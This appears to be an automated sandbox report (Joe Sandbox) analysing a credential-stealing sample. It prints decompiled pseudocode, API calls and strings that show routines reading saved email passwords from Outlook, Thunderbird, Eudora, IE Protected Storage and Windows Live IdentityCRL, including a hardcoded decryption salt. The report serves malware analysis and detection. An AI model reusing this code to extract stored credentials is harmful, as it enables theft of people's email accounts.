                                                              0x0040206e
                                                              0x00402073
                                                              0x0040207d
                                                              0x004020a1
                                                              0x004020a8
                                                              0x004020b6
                                                              0x004020bd
                                                              0x004020c3
                                                              0x004020d6
                                                              0x004020da
                                                              0x004020df
                                                              0x004020f8
                                                              0x004020e1
                                                              0x004020ef
                                                              0x004020f5
                                                              0x00402104
                                                              0x00402117
                                                              0x0040211f
                                                              0x0040213c
                                                              0x00402121
                                                              0x00402133
                                                              0x00402139
                                                              0x00402152
                                                              0x00402165
                                                              0x00000000
                                                              0x00402189
                                                              0x00402199
                                                              0x00000000
                                                              0x0040219f
                                                              0x00402152
                                                              0x00402167
                                                              0x00402167
                                                              0x00402177
                                                              0x0040217c
                                                              0x0040217f
                                                              0x00000000
                                                              0x00402187

                                                              APIs
                                                              • memset.MSVCRT ref: 00401EAD
                                                              • strlen.MSVCRT ref: 00401EC6
                                                              • strlen.MSVCRT ref: 00401ED4
                                                              • strlen.MSVCRT ref: 00401F1A
                                                              • strlen.MSVCRT ref: 00401F28
                                                              • memset.MSVCRT ref: 00401FD3
                                                              • atoi.MSVCRT ref: 00402002
                                                              • memset.MSVCRT ref: 00402025
                                                              • sprintf.MSVCRT ref: 00402052
                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                              • memset.MSVCRT ref: 004020A8
                                                              • memset.MSVCRT ref: 004020BD
                                                              • strlen.MSVCRT ref: 004020C3
                                                              • strlen.MSVCRT ref: 004020D1
                                                              • strlen.MSVCRT ref: 00402104
                                                              • strlen.MSVCRT ref: 00402112
                                                              • memset.MSVCRT ref: 0040203A
                                                                • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                              • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                                • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                              • API String ID: 2492260235-4223776976
                                                              • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                              • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                              • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                              • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              C-Code - Quality: 85%
                                                              			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                              				char* _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				void* _v304;
                                                              				signed int _v308;
                                                              				struct HWND__* _v312;
                                                              				intOrPtr _v604;
                                                              				struct HACCEL__* _v620;
                                                              				struct HWND__* _v644;
                                                              				char _v900;
                                                              				char _v904;
                                                              				char _v908;
                                                              				struct tagMSG _v936;
                                                              				intOrPtr _v940;
                                                              				struct HWND__* _v944;
                                                              				struct HWND__* _v948;
                                                              				char _v956;
                                                              				char _v980;
                                                              				char _v988;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t49;
                                                              				void* _t52;
                                                              				int _t56;
                                                              				int _t58;
                                                              				int _t68;
                                                              				void* _t72;
                                                              				int _t75;
                                                              				int _t77;
                                                              				struct HWND__* _t78;
                                                              				int _t80;
                                                              				int _t85;
                                                              				int _t86;
                                                              				struct HWND__* _t100;
                                                              
                                                              				 *0x416b94 = _a4; // executed
                                                              				_t49 = E00404837(__ecx); // executed
                                                              				if(_t49 != 0) {
                                                              					E0040EDAC();
                                                              					_t52 = E00406A2C( &_v980);
                                                              					_t100 = 0;
                                                              					_v940 = 0x20;
                                                              					_v948 = 0;
                                                              					_v936.hwnd = 0;
                                                              					_v944 = 0;
                                                              					_v936.message = 0;
                                                              					E0040B785(_t52,  &_v900);
                                                              					_v8 =  &_v980;
                                                              					E00406C87(__eflags,  &_v980, _a12);
                                                              					_t56 = E00406DFB(_v16, "/savelangfile");
                                                              					__eflags = _t56;
                                                              					if(_t56 < 0) {
                                                              						E0040823D(); // executed
                                                              						_t58 = E00406DFB(_v8, "/deleteregkey");
                                                              						__eflags = _t58;
                                                              						if(_t58 < 0) {
                                                              							 *0x417110 = 0x11223344; // executed
                                                              							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
                                                              							__eflags =  *0x417110 - 0x1c233487;
                                                              							if( *0x417110 == 0x1c233487) {
                                                              								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
                                                              								if(__eflags <= 0) {
                                                              									L13:
                                                              									__imp__CoInitialize(_t100);
                                                              									E0040B70A( &_v908);
                                                              									__eflags = _v604 - 3;
                                                              									if(_v604 != 3) {
                                                              										_push(5);
                                                              									} else {
                                                              										_push(3);
                                                              									}
                                                              									ShowWindow(_v644, ??);
                                                              									UpdateWindow(_v644);
                                                              									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
                                                              									E0040AD9D( &_v908);
                                                              									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                              									__eflags = _t68;
                                                              									if(_t68 == 0) {
                                                              										L24:
                                                              										__imp__CoUninitialize();
                                                              										goto L25;
                                                              									} else {
                                                              										do {
                                                              											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
                                                              											__eflags = _t75;
                                                              											if(_t75 != 0) {
                                                              												goto L23;
                                                              											}
                                                              											_t78 =  *0x4171ac;
                                                              											__eflags = _t78 - _t100;
                                                              											if(_t78 == _t100) {
                                                              												L21:
                                                              												_t80 = IsDialogMessageA(_v644,  &_v936);
                                                              												__eflags = _t80;
                                                              												if(_t80 == 0) {
                                                              													TranslateMessage( &_v936);
                                                              													DispatchMessageA( &_v936);
                                                              												}
                                                              												goto L23;
                                                              											}
                                                              											_t85 = IsDialogMessageA(_t78,  &_v936);
                                                              											__eflags = _t85;
                                                              											if(_t85 != 0) {
                                                              												goto L23;
                                                              											}
                                                              											goto L21;
                                                              											L23:
                                                              											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                              											__eflags = _t77;
                                                              										} while (_t77 != 0);
                                                              										goto L24;
                                                              									}
                                                              								}
                                                              								_t86 = E0040B8D7( &_v904, __eflags);
                                                              								__eflags = _t86;
                                                              								if(_t86 == 0) {
                                                              									_t100 = 0;
                                                              									__eflags = 0;
                                                              									goto L13;
                                                              								}
                                                              								_push(_v28);
                                                              								_v904 = 0x41356c;
                                                              								L004115D6();
                                                              								__eflags = _v304;
                                                              								if(_v304 != 0) {
                                                              									DeleteObject(_v304);
                                                              									_v308 = _v308 & 0x00000000;
                                                              								}
                                                              								goto L27;
                                                              							}
                                                              							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
                                                              							goto L25;
                                                              						}
                                                              						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
                                                              						goto L25;
                                                              					} else {
                                                              						 *0x417488 = 0x416b28;
                                                              						E0040836E();
                                                              						L25:
                                                              						_push(_v32);
                                                              						_v908 = 0x41356c;
                                                              						L004115D6();
                                                              						__eflags = _v308 - _t100;
                                                              						if(_v308 != _t100) {
                                                              							DeleteObject(_v308);
                                                              							_v312 = _t100;
                                                              						}
                                                              						L27:
                                                              						_v908 = 0x412474;
                                                              						E00406A4E( &_v988);
                                                              						E0040462E( &_v956);
                                                              						E00406A4E( &_v988);
                                                              						_t72 = 0;
                                                              						__eflags = 0;
                                                              						goto L28;
                                                              					}
                                                              				} else {
                                                              					_t72 = _t49 + 1;
                                                              					L28:
                                                              					return _t72;
                                                              				}
                                                              			}








































                                                              0x0040b9bf
                                                              0x0040b9c4
                                                              0x0040b9cb
                                                              0x0040b9d3
                                                              0x0040b9dc
                                                              0x0040b9e1
                                                              0x0040b9e7
                                                              0x0040b9ef
                                                              0x0040b9f3
                                                              0x0040b9f7
                                                              0x0040b9fb
                                                              0x0040b9ff
                                                              0x0040ba0c
                                                              0x0040ba13
                                                              0x0040ba24
                                                              0x0040ba29
                                                              0x0040ba2b
                                                              0x0040ba41
                                                              0x0040ba52
                                                              0x0040ba57
                                                              0x0040ba59
                                                              0x0040ba7c
                                                              0x0040ba86
                                                              0x0040ba8c
                                                              0x0040ba96
                                                              0x0040bab7
                                                              0x0040babb
                                                              0x0040bb09
                                                              0x0040bb0a
                                                              0x0040bb14
                                                              0x0040bb19
                                                              0x0040bb21
                                                              0x0040bb27
                                                              0x0040bb23
                                                              0x0040bb23
                                                              0x0040bb23
                                                              0x0040bb30
                                                              0x0040bb3d
                                                              0x0040bb51
                                                              0x0040bb5c
                                                              0x0040bb6f
                                                              0x0040bb71
                                                              0x0040bb73
                                                              0x0040bbe3
                                                              0x0040bbe3
                                                              0x00000000
                                                              0x0040bb75
                                                              0x0040bb7b
                                                              0x0040bb8e
                                                              0x0040bb94
                                                              0x0040bb96
                                                              0x00000000
                                                              0x00000000
                                                              0x0040bb98
                                                              0x0040bb9d
                                                              0x0040bb9f
                                                              0x0040bbad
                                                              0x0040bbb9
                                                              0x0040bbbb
                                                              0x0040bbbd
                                                              0x0040bbc4
                                                              0x0040bbcf
                                                              0x0040bbcf
                                                              0x00000000
                                                              0x0040bbbd
                                                              0x0040bba7
                                                              0x0040bba9
                                                              0x0040bbab
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040bbd5
                                                              0x0040bbdd
                                                              0x0040bbdf
                                                              0x0040bbdf
                                                              0x00000000
                                                              0x0040bb7b
                                                              0x0040bb73
                                                              0x0040bac1
                                                              0x0040bac6
                                                              0x0040bac8
                                                              0x0040bb07
                                                              0x0040bb07
                                                              0x00000000
                                                              0x0040bb07
                                                              0x0040baca
                                                              0x0040bad1
                                                              0x0040bad9
                                                              0x0040bade
                                                              0x0040bae7
                                                              0x0040baf4
                                                              0x0040bafa
                                                              0x0040bafa
                                                              0x00000000
                                                              0x0040bae7
                                                              0x0040baa5
                                                              0x00000000
                                                              0x0040baa5
                                                              0x0040ba65
                                                              0x00000000
                                                              0x0040ba2d
                                                              0x0040ba2d
                                                              0x0040ba37
                                                              0x0040bbe9
                                                              0x0040bbe9
                                                              0x0040bbf0
                                                              0x0040bbf8
                                                              0x0040bbfd
                                                              0x0040bc05
                                                              0x0040bc0e
                                                              0x0040bc14
                                                              0x0040bc14
                                                              0x0040bc1b
                                                              0x0040bc1f
                                                              0x0040bc27
                                                              0x0040bc30
                                                              0x0040bc39
                                                              0x0040bc3e
                                                              0x0040bc3e
                                                              0x00000000
                                                              0x0040bc3e
                                                              0x0040b9cd
                                                              0x0040b9cd
                                                              0x0040bc40
                                                              0x0040bc46
                                                              0x0040bc46

                                                              APIs
                                                                • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,74B04DE0,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 00404856
                                                                • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 0040487C
                                                                • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                              • DeleteObject.GDI32(?), ref: 0040BC0E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                              • API String ID: 745651260-414181363
                                                              • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                              • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                              • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                              • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              C-Code - Quality: 65%
                                                              			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
                                                              				char _v8;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				struct HINSTANCE__* _t38;
                                                              				void* _t52;
                                                              				void* _t54;
                                                              				void* _t56;
                                                              				void* _t58;
                                                              				void* _t60;
                                                              				char* _t73;
                                                              				void* _t76;
                                                              				_Unknown_base(*)()* _t86;
                                                              				void* _t87;
                                                              				void* _t89;
                                                              				signed int _t98;
                                                              				char* _t106;
                                                              				_Unknown_base(*)()* _t120;
                                                              				void* _t131;
                                                              
                                                              				_t131 = __fp0;
                                                              				_t91 = __ecx;
                                                              				_push(__ecx);
                                                              				_t98 = __ecx;
                                                              				_t89 = __ecx + 0x87c;
                                                              				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
                                                              				E0040E894(_t89);
                                                              				_t38 = LoadLibraryA("pstorec.dll"); // executed
                                                              				 *(_t89 + 8) = _t38;
                                                              				if(_t38 == 0) {
                                                              					L4:
                                                              					E0040E894(_t89);
                                                              				} else {
                                                              					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
                                                              					_t120 = _t86;
                                                              					_t91 = 0 | _t120 != 0x00000000;
                                                              					 *(_t89 + 0x10) = _t86;
                                                              					if(_t120 != 0) {
                                                              						goto L4;
                                                              					} else {
                                                              						_t91 = _t89 + 4;
                                                              						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
                                                              						_t122 = _t87;
                                                              						if(_t87 != 0) {
                                                              							goto L4;
                                                              						} else {
                                                              							 *(_t89 + 0xc) = 1;
                                                              						}
                                                              					}
                                                              				}
                                                              				E004047A0(_t98 + 0x890, _t122);
                                                              				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
                                                              				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
                                                              				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
                                                              				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
                                                              				_push(_t98 + 0x858); // executed
                                                              				E0040754D(_t91, _t122); // executed
                                                              				E0040719C(_t91, _t98 + 0x86c); // executed
                                                              				E0040765B(_t122, _t98 + 0x878); // executed
                                                              				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
                                                              				_t123 = _t52;
                                                              				if(_t52 == 0) {
                                                              					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
                                                              				}
                                                              				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
                                                              				_t124 = _t54;
                                                              				if(_t54 == 0) {
                                                              					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
                                                              				}
                                                              				E00402C44(_t91, _t131, _t98); // executed
                                                              				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
                                                              				_t56 = E00406278();
                                                              				_push( &_v8);
                                                              				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
                                                              					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
                                                              				} else {
                                                              					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
                                                              				}
                                                              				_push(0x80000001);
                                                              				_t58 = E0040EB3F();
                                                              				_t126 = _t58;
                                                              				if(_t58 != 0) {
                                                              					 *((char*)(_t98 + 0xa9c)) = 0;
                                                              				} else {
                                                              					E00402B09( &_v8, _t126, _t131, _t98);
                                                              				}
                                                              				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
                                                              				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
                                                              				_t127 = _t60;
                                                              				if(_t60 != 0) {
                                                              					 *((char*)(_t98 + 0xa9c)) = 0;
                                                              				} else {
                                                              					E00402B09( &_v8, _t127, _t131, _t98);
                                                              				}
                                                              				E0040E8AB(_t89);
                                                              				E004047F1(_t98 + 0x890);
                                                              				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
                                                              				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
                                                              				E0040329E(_t131, _t98);
                                                              				E004034CB(_t91, _t127, _t131, _t98); // executed
                                                              				E0040396C(_t127, _t131, _t98); // executed
                                                              				E004037B1(_t91, _t98, _t131, _t98); // executed
                                                              				_t73 = _t98 + 0xb20;
                                                              				_t128 =  *_t73;
                                                              				if( *_t73 != 0) {
                                                              					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
                                                              					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
                                                              				}
                                                              				_t106 = _t98 + 0xc25;
                                                              				_t129 =  *_t106;
                                                              				if( *_t106 != 0) {
                                                              					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
                                                              					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
                                                              					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
                                                              				}
                                                              				_push(_t98 + 0x640); // executed
                                                              				E0040D9F9(_t129); // executed
                                                              				E0040D865(_t98 + 0x640);
                                                              				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
                                                              				return _t76;
                                                              			}





















                                                              0x00403c3d
                                                              0x00403c3d
                                                              0x00403c40
                                                              0x00403c44
                                                              0x00403c46
                                                              0x00403c4c
                                                              0x00403c52
                                                              0x00403c5c
                                                              0x00403c66
                                                              0x00403c69
                                                              0x00403c9b
                                                              0x00403c9d
                                                              0x00403c6b
                                                              0x00403c71
                                                              0x00403c79
                                                              0x00403c7b
                                                              0x00403c7e
                                                              0x00403c83
                                                              0x00000000
                                                              0x00403c85
                                                              0x00403c88
                                                              0x00403c8c
                                                              0x00403c8e
                                                              0x00403c90
                                                              0x00000000
                                                              0x00403c92
                                                              0x00403c92
                                                              0x00403c92
                                                              0x00403c90
                                                              0x00403c83
                                                              0x00403ca8
                                                              0x00403cb2
                                                              0x00403cbc
                                                              0x00403cc6
                                                              0x00403cd0
                                                              0x00403cdb
                                                              0x00403cdc
                                                              0x00403ce8
                                                              0x00403cf4
                                                              0x00403d07
                                                              0x00403d0f
                                                              0x00403d11
                                                              0x00403d19
                                                              0x00403d19
                                                              0x00403d2c
                                                              0x00403d34
                                                              0x00403d36
                                                              0x00403d3e
                                                              0x00403d3e
                                                              0x00403d44
                                                              0x00403d49
                                                              0x00403d53
                                                              0x00403d5f
                                                              0x00403d60
                                                              0x00403d69
                                                              0x00403d62
                                                              0x00403d62
                                                              0x00403d62
                                                              0x00403d6e
                                                              0x00403d73
                                                              0x00403d7b
                                                              0x00403d7d
                                                              0x00403d8a
                                                              0x00403d7f
                                                              0x00403d83
                                                              0x00403d83
                                                              0x00403d9f
                                                              0x00403da9
                                                              0x00403db1
                                                              0x00403db3
                                                              0x00403dc0
                                                              0x00403db5
                                                              0x00403db9
                                                              0x00403db9
                                                              0x00403dc9
                                                              0x00403dd4
                                                              0x00403de0
                                                              0x00403dec
                                                              0x00403df2
                                                              0x00403df8
                                                              0x00403dfe
                                                              0x00403e04
                                                              0x00403e09
                                                              0x00403e0f
                                                              0x00403e12
                                                              0x00403e1d
                                                              0x00403e27
                                                              0x00403e27
                                                              0x00403e2c
                                                              0x00403e32
                                                              0x00403e35
                                                              0x00403e45
                                                              0x00403e55
                                                              0x00403e5f
                                                              0x00403e5f
                                                              0x00403e6a
                                                              0x00403e6b
                                                              0x00403e71
                                                              0x00403e7d
                                                              0x00403e86

                                                              APIs
                                                                • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                              • strcpy.MSVCRT(?,?), ref: 00403E45
                                                              Strings
                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                              • PStoreCreateInstance, xrefs: 00403C6B
                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                              • pstorec.dll, xrefs: 00403C57
                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProcstrcpy
                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                              • API String ID: 2884822230-961845771
                                                              • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                              • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                              • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                              • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 224 40d9f9-40da2e call 4118a0 RegOpenKeyExA 227 40db30-40db36 224->227 228 40da34-40da48 RegOpenKeyExA 224->228 229 40db26-40db2a RegCloseKey 228->229 230 40da4e-40da77 RegQueryValueExA 228->230 229->227 231 40db1c-40db20 RegCloseKey 230->231 232 40da7d-40da8c call 4047a0 230->232 231->229 232->231 235 40da92-40daca call 404811 232->235 235->231 238 40dacc-40dad4 235->238 239 40db12-40db16 LocalFree 238->239 240 40dad6-40db0d memcpy * 2 call 40d6fb 238->240 239->231 240->239
                                                              C-Code - Quality: 96%
                                                              			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
                                                              				void* _v0;
                                                              				void* __esi;
                                                              				long _t34;
                                                              				long _t36;
                                                              				long _t40;
                                                              				void* _t64;
                                                              				void* _t68;
                                                              				int _t73;
                                                              
                                                              				E004118A0(0x102c, _t64);
                                                              				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
                                                              				if(_t34 != 0) {
                                                              					L10:
                                                              					return _t34;
                                                              				}
                                                              				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
                                                              				if(_t36 != 0) {
                                                              					L9:
                                                              					_t34 = RegCloseKey(_v0); // executed
                                                              					goto L10;
                                                              				}
                                                              				_a8 = 0x1000;
                                                              				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
                                                              				_t81 = _t40;
                                                              				if(_t40 == 0) {
                                                              					_t63 = _a4 + 0xc;
                                                              					if(E004047A0(_a4 + 0xc, _t81) != 0) {
                                                              						_a20 = _a8;
                                                              						_a24 =  &_a40;
                                                              						_t73 = 0x40;
                                                              						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
                                                              						_a28 = _t73;
                                                              						_a32 = _t68;
                                                              						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
                                                              							if(_a12 < 0x400) {
                                                              								memcpy( &_a40, _t68, _t73);
                                                              								memcpy( &_a104, _a16, _a12);
                                                              								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
                                                              							}
                                                              							LocalFree(_a16);
                                                              						}
                                                              					}
                                                              				}
                                                              				RegCloseKey(_a4);
                                                              				goto L9;
                                                              			}











                                                              0x0040da04
                                                              0x0040da2a
                                                              0x0040da2e
                                                              0x0040db30
                                                              0x0040db36
                                                              0x0040db36
                                                              0x0040da44
                                                              0x0040da48
                                                              0x0040db26
                                                              0x0040db2a
                                                              0x00000000
                                                              0x0040db2a
                                                              0x0040da67
                                                              0x0040da6f
                                                              0x0040da75
                                                              0x0040da77
                                                              0x0040da80
                                                              0x0040da8c
                                                              0x0040da96
                                                              0x0040daa0
                                                              0x0040daa4
                                                              0x0040dab4
                                                              0x0040dabb
                                                              0x0040dabf
                                                              0x0040daca
                                                              0x0040dad4
                                                              0x0040dadd
                                                              0x0040daf2
                                                              0x0040db0d
                                                              0x0040db0d
                                                              0x0040db16
                                                              0x0040db16
                                                              0x0040daca
                                                              0x0040da8c
                                                              0x0040db20
                                                              0x00000000

                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                              • memcpy.MSVCRT ref: 0040DADD
                                                              • memcpy.MSVCRT ref: 0040DAF2
                                                                • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                                • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
